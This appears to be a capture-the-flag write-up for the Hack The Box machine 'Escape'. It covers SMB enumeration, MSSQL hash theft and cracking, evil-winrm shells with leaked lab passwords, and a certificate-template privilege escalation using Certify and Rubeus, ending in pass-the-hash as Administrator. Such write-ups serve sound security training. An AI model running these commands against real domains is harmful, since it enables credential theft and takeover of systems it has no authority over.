search

Escape

Write up for the HTB machine 'Escape'

hashtag
Inital recon

hashtag
nmap

nmap -sC -sV 10.10.11.202 -Pn

PORT     STATE SERVICE      VERSION
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2023-05-28 11:18:13Z)
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
|_ssl-date: 2023-05-28T11:18:58+00:00; +7h59m34s from scanner time.
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap     Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
|_ssl-date: 2023-05-28T11:18:58+00:00; +7h59m34s from scanner time.
1433/tcp open  ms-sql-s     Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-05-28T11:17:39
|_Not valid after:  2053-05-28T11:17:39
|_ssl-date: 2023-05-28T11:18:58+00:00; +7h59m34s from scanner time.
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
|_ssl-date: 2023-05-28T11:18:58+00:00; +7h59m34s from scanner time.
3269/tcp open  ssl/ldap     Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
|_ssl-date: 2023-05-28T11:18:58+00:00; +7h59m34s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h59m33s, deviation: 0s, median: 7h59m33s

hashtag
SMB

Let's check if there's any guest or anonymous access to the smbshare:

smbmap -u "" -p "" -P 445 -H 10.10.11.202 && smbmap -u "guest" -p "" -P 445 -H 10.10.11.202

Here we can see that there is a read only disk called Public, using smbclient --no-pass //10.10.11.202/Public we can see a file called SQL Server Procedures.pdf, so let's download it using smbget smb://10.10.11.202/Public -R, and we get some guest credentials.

Following HackTricksarrow-up-right we are able to steal a hash using msfconsole and responder and then crack the hash using johntheripper john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt for the user sql_svc.

hashtag
User.txt

Next we can use rpcclient to do some enumeration: rpcclient -U sql_svc 10.10.11.202

Next, let's use evil-winrm for a shell:

evil-winrm -i 10.10.11.202 -u sql_svc -p 'REGGIE1234ronnie'

We can also upload and run winPEAS, but unfortunately nothing comes up.

Further enumeration of the file system reveals that C:\SQLserver\Logs contains some credentials:

So let's use those credentials with evil-winrm for another shell

evil-winrm -i 10.10.11.202 -u Ryan.Cooper -p 'NuclearMosquito3'

user.txt can be found at C:\Users\Ryan.Cooper\Desktop

hashtag
Root.txt

Let's upload Certify.exe to see if there is anything vulnerable certificate templates

./Certify.exe find /vulnerable /currentuser

Following a guide on how to exploit this vulnerable templatearrow-up-right we can arrive at the following commands:

  1. Run this on your target machine to get the certificate: ./Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:Administrator then copy the certificate to your attacking machine.

  2. Run this on your attacking machine: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx then upload cert.pfx to the target machine

  3. Run this on the target machine: ./Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials then copy the NTLM hash

  4. Run this on your attacking machine for a shell as Administrator: evil-winrm -i 10.10.11.202 -u Administrator -H A52F78E4C751E5F5E17E1E9F3E58F4EE

root.txt can be found at C:\Users\Administrator\Desktop

PreviousBusquedaNextFormat

Last updated